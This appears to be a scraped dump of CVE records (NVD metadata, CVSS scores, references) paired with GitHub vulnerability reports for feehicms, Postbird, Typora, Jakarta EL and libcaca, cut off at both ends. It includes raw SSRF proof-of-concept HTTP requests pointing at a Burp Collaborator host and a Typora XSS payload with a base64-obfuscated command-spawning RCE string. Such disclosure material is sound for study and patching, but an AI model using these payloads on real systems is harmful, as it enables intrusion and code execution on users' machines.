zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://8oxj66ons65elf2qv4rtf9p7aygo4d.burpcollaborator.net Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254900; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D Upgrade-Insecure-Requests: 1 ``` ### 3. Login with our account and password - ![image](https://user-images.githubusercontent.com/25664828/113249468-4f4aae00-92f1-11eb-8cd5-f586f81b5354.png) ### use burpsuite , We don't modify anything ### The second POC request is as follows ```http POST http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1 Host: demo.cms.feehi.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 231 Origin: http://demo.cms.feehi.com Connection: close Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254930; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D Upgrade-Insecure-Requests: 1 _csrf=kgPC6DtyS_hxWBm1BRhqtuxuO1lKLvtXbXluSk4cmje_MKq5TkJ7iAQATtFcXh38ridoEydKuAY7SiQEAVLPeA%3D%3D&LoginForm%5Busername%5D=test123&LoginForm%5Bpassword%5D=123456&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button= ``` ### Then we found that the response packet of the second request contained a 302 jump, The jump url is the Referrer header of our first request packet ### The response of the second request packet is as follows - ![image](https://user-images.githubusercontent.com/25664828/113250030-558d5a00-92f2-11eb-9183-d6d292dc44bb.png) ### 4. Vulnerability proof - ![image](https://user-images.githubusercontent.com/25664828/113253080-5aa0d800-92f7-11eb-90e4-921e586644d9.png) - ![image](https://user-images.githubusercontent.com/25664828/113253301-a0f63700-92f7-11eb-8be7-da46bf80b08b.png) ### 5. how to fix https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
SSRF vulnerability in feehicms v2.1.1
https://api.github.com/repos/liufee/cms/issues/57/comments
3
2021-04-01T06:38:09Z
2022-08-29T10:01:12Z
https://github.com/liufee/cms/issues/57
848,053,941
57
1,990
CVE-2021-33570
2021-05-25T22:15:10.353
Postbird 0.8.4 allows stored XSS via the onerror attribute of an IMG element in any PostgreSQL database table. This can result in reading local files via vectors involving XMLHttpRequest and open of a file:/// URL, or discovering PostgreSQL passwords via vectors involving Window.localStorage and savedConnections.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162831/Postbird-0.8.4-Cross-Site-Scripting-Local-File-Inclusion.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162872/Postbird-0.8.4-XSS-LFI-Insecure-Data-Storage.html" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/132" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/133" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/134" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Tridentsec-io/postbird" }, { "source": "cve@mitre.org", "tags": [ "Broken Link", "Third Party Advisory", "URL Repurposed" ], "url": "https://tridentsec.io/blogs/postbird-cve-2021-33570/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/49910" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162831/Postbird-0.8.4-Cross-Site-Scripting-Local-File-Inclusion.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162872/Postbird-0.8.4-XSS-LFI-Insecure-Data-Storage.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/132" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/133" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/134" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Tridentsec-io/postbird" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Third Party Advisory", "URL Repurposed" ], "url": "https://tridentsec.io/blogs/postbird-cve-2021-33570/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/49910" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:postbird_project:postbird:0.8.4:*:*:*:*:*:*:*", "matchCriteriaId": "65F856E6-B245-4295-A0AC-691C01A9CE2F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Paxa/postbird/issues/132
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Paxa", "postbird" ]
[Tridentsec](https://tridentsec.io) team has found the XSS vulnerability in the Postbird application version - 0.8.4. The vulnerability was very Critical and exploiting the vulnerability can lead to Data Breach. We were able to inject malicious JavaScript into the application, leading us to two other vulnerabilities, Local File Inclusion(LFI) and PostgreSQL Password Stealing. Proof-of-Concept Code & detailed vulnerability report could be find here: https://github.com/Tridentsec-io/postbird
Security Vulnerability [Stored -XSS]
https://api.github.com/repos/Paxa/postbird/issues/132/comments
1
2021-05-25T13:48:21Z
2021-08-30T09:28:31Z
https://github.com/Paxa/postbird/issues/132
900,839,532
132
1,991
CVE-2021-33570
2021-05-25T22:15:10.353
Postbird 0.8.4 allows stored XSS via the onerror attribute of an IMG element in any PostgreSQL database table. This can result in reading local files via vectors involving XMLHttpRequest and open of a file:/// URL, or discovering PostgreSQL passwords via vectors involving Window.localStorage and savedConnections.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162831/Postbird-0.8.4-Cross-Site-Scripting-Local-File-Inclusion.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162872/Postbird-0.8.4-XSS-LFI-Insecure-Data-Storage.html" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/132" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/133" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/134" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Tridentsec-io/postbird" }, { "source": "cve@mitre.org", "tags": [ "Broken Link", "Third Party Advisory", "URL Repurposed" ], "url": "https://tridentsec.io/blogs/postbird-cve-2021-33570/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/49910" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162831/Postbird-0.8.4-Cross-Site-Scripting-Local-File-Inclusion.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162872/Postbird-0.8.4-XSS-LFI-Insecure-Data-Storage.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/132" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/133" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/134" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Tridentsec-io/postbird" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Third Party Advisory", "URL Repurposed" ], "url": "https://tridentsec.io/blogs/postbird-cve-2021-33570/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/49910" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:postbird_project:postbird:0.8.4:*:*:*:*:*:*:*", "matchCriteriaId": "65F856E6-B245-4295-A0AC-691C01A9CE2F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Paxa/postbird/issues/133
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Paxa", "postbird" ]
[Tridentsec](https://tridentsec.io) team has found the LFI vulnerability in the Postbird application version - 0.8.4. The vulnerability was very Critical and exploiting the vulnerability can lead to Data Breach. Using this vulnerability a hacker can steal any file located on Postbird application users computer. Proof-of-Concept Code & detailed vulnerability report could be find here: https://github.com/Tridentsec-io/postbird
Security Vulnerability [Local File Inclusion (LFI)]
https://api.github.com/repos/Paxa/postbird/issues/133/comments
1
2021-05-25T13:51:01Z
2021-08-30T09:28:21Z
https://github.com/Paxa/postbird/issues/133
900,843,086
133
1,992
CVE-2021-33570
2021-05-25T22:15:10.353
Postbird 0.8.4 allows stored XSS via the onerror attribute of an IMG element in any PostgreSQL database table. This can result in reading local files via vectors involving XMLHttpRequest and open of a file:/// URL, or discovering PostgreSQL passwords via vectors involving Window.localStorage and savedConnections.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162831/Postbird-0.8.4-Cross-Site-Scripting-Local-File-Inclusion.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162872/Postbird-0.8.4-XSS-LFI-Insecure-Data-Storage.html" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/132" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/133" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/134" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Tridentsec-io/postbird" }, { "source": "cve@mitre.org", "tags": [ "Broken Link", "Third Party Advisory", "URL Repurposed" ], "url": "https://tridentsec.io/blogs/postbird-cve-2021-33570/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/49910" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162831/Postbird-0.8.4-Cross-Site-Scripting-Local-File-Inclusion.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162872/Postbird-0.8.4-XSS-LFI-Insecure-Data-Storage.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/132" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/133" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Paxa/postbird/issues/134" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Tridentsec-io/postbird" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Third Party Advisory", "URL Repurposed" ], "url": "https://tridentsec.io/blogs/postbird-cve-2021-33570/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/49910" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:postbird_project:postbird:0.8.4:*:*:*:*:*:*:*", "matchCriteriaId": "65F856E6-B245-4295-A0AC-691C01A9CE2F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Paxa/postbird/issues/134
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Paxa", "postbird" ]
[Tridentsec](https://tridentsec.io) team has found a vulnerability in the Postbird application version - 0.8.4. The vulnerability was very Critical and exploiting the vulnerability can lead to PostgreSQL password breach. Using this vulnerability a hacker can steal all PostgreSQL password saved in your Postbird application. Proof-of-Concept Code & detailed vulnerability report could be find here: https://github.com/Tridentsec-io/postbird
Security Vulnerability [PostgreSQL Password Stealing]
https://api.github.com/repos/Paxa/postbird/issues/134/comments
1
2021-05-25T13:53:33Z
2021-08-30T09:28:13Z
https://github.com/Paxa/postbird/issues/134
900,846,413
134
1,993
CVE-2020-18221
2021-05-26T15:15:07.857
Cross Site Scripting (XSS) in Typora v0.9.65 and earlier allows remote attackers to execute arbitrary code by injecting commands during block rendering of a mathematical formula.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/typora/typora-issues/issues/2204" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/typora/typora-issues/issues/2204" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typora:typora:*:*:*:*:*:*:*:*", "matchCriteriaId": "84CC7C46-7E5E-45CF-BACE-C61304BF41C6", "versionEndExcluding": null, "versionEndIncluding": "0.9.65", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/typora/typora-issues/issues/2204
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "typora", "typora-issues" ]
Tested On Windows 10 Version:v0.9.65 ![01](https://user-images.githubusercontent.com/19523172/53060669-45d99f80-34f6-11e9-9e41-eb285ec48ee4.png) XSS: ``` <svg> <iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe> ``` ![02](https://user-images.githubusercontent.com/19523172/53060698-64d83180-34f6-11e9-8132-24f94b45b0e5.png) ![03](https://user-images.githubusercontent.com/19523172/53060728-6c97d600-34f6-11e9-9c81-23f4e8da9a1b.png) RCE: ``` <svg> <iframe srcdoc="<iframe src=javascript:eval(atob('dmFyIFByb2Nlc3MgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmJpbmRpbmcoJ3Byb2Nlc3Nfd3JhcCcpLlByb2Nlc3M7CnZhciBwcm9jID0gbmV3IFByb2Nlc3MoKTsKcHJvYy5vbmV4aXQgPSBmdW5jdGlvbiAoYSwgYikge307CnZhciBlbnYgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmVudjsKdmFyIGVudl8gPSBbXTsKZm9yICh2YXIga2V5IGluIGVudikgZW52Xy5wdXNoKGtleSArICc9JyArIGVudltrZXldKTsKcHJvYy5zcGF3bih7CiAgICBmaWxlOiAnY21kLmV4ZScsCiAgICBhcmdzOiBbJy9rIGNhbGMnXSwKICAgIGN3ZDogbnVsbCwKICAgIHdpbmRvd3NWZXJiYXRpbUFyZ3VtZW50czogZmFsc2UsCiAgICBkZXRhY2hlZDogZmFsc2UsCiAgICBlbnZQYWlyczogZW52XywKICAgIHN0ZGlvOiBbewogICAgICAgIHR5cGU6ICdpZ25vcmUnCiAgICB9LCB7CiAgICAgICAgdHlwZTogJ2lnbm9yZScKICAgIH0sIHsKICAgICAgICB0eXBlOiAnaWdub3JlJwogICAgfV0KfSk7'))>"></iframe> ``` ![04](https://user-images.githubusercontent.com/19523172/53060784-99e48400-34f6-11e9-9b27-e026f77ec21e.png) [poc.zip](https://github.com/typora/typora-issues/files/2882694/poc.zip)
Typora(v0.9.65) XSS to RCE
https://api.github.com/repos/typora/typora-issues/issues/2204/comments
1
2019-02-20T02:08:33Z
2019-03-15T10:32:39Z
https://github.com/typora/typora-issues/issues/2204
412,210,245
2,204
1,994
CVE-2021-28170
2021-05-26T22:15:07.980
In the Jakarta Expression Language implementation 3.0.3 and earlier, a bug in the ELParserTokenManager enables invalid EL expressions to be evaluated as if they were valid.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "emo@eclipse.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/eclipse-ee4j/el-ri/issues/155" }, { "source": "emo@eclipse.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://securitylab.github.com/advisories/GHSL-2020-021-jakarta-el/" }, { "source": "emo@eclipse.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/eclipse-ee4j/el-ri/issues/155" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://securitylab.github.com/advisories/GHSL-2020-021-jakarta-el/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eclipse:jakarta_expression_language:*:*:*:*:*:*:*:*", "matchCriteriaId": "9D4D9319-3396-43B2-8466-D9C40E2D4680", "versionEndExcluding": null, "versionEndIncluding": "3.0.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "matchCriteriaId": "BB0158D3-CF4B-4355-8F33-D57BFC1C0398", "versionEndExcluding": "2.3.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.14.0:*:*:*:*:*:*:*", "matchCriteriaId": "4479F76A-4B67-41CC-98C7-C76B81050F8E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "04BCDC24-4A21-473C-8733-0D9CFB38A752", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "917" ]
917
https://github.com/eclipse-ee4j/el-ri/issues/155
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "eclipse-ee4j", "el-ri" ]
Github posted this publicly about 2-weeks ago - https://securitylab.github.com/advisories/GHSL-2020-021-jakarta-el/
GHSL-2020-021 - Bypass input sanitization of EL expressions
https://api.github.com/repos/jakartaee/expression-language/issues/155/comments
4
2021-04-14T18:51:51Z
2021-08-16T10:19:50Z
https://github.com/jakartaee/expression-language/issues/155
858,175,321
155
1,995
CVE-2021-30498
2021-05-26T22:15:08.157
A flaw was found in libcaca. A heap buffer overflow in export.c in function export_tga might lead to memory corruption and other potential consequences.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": 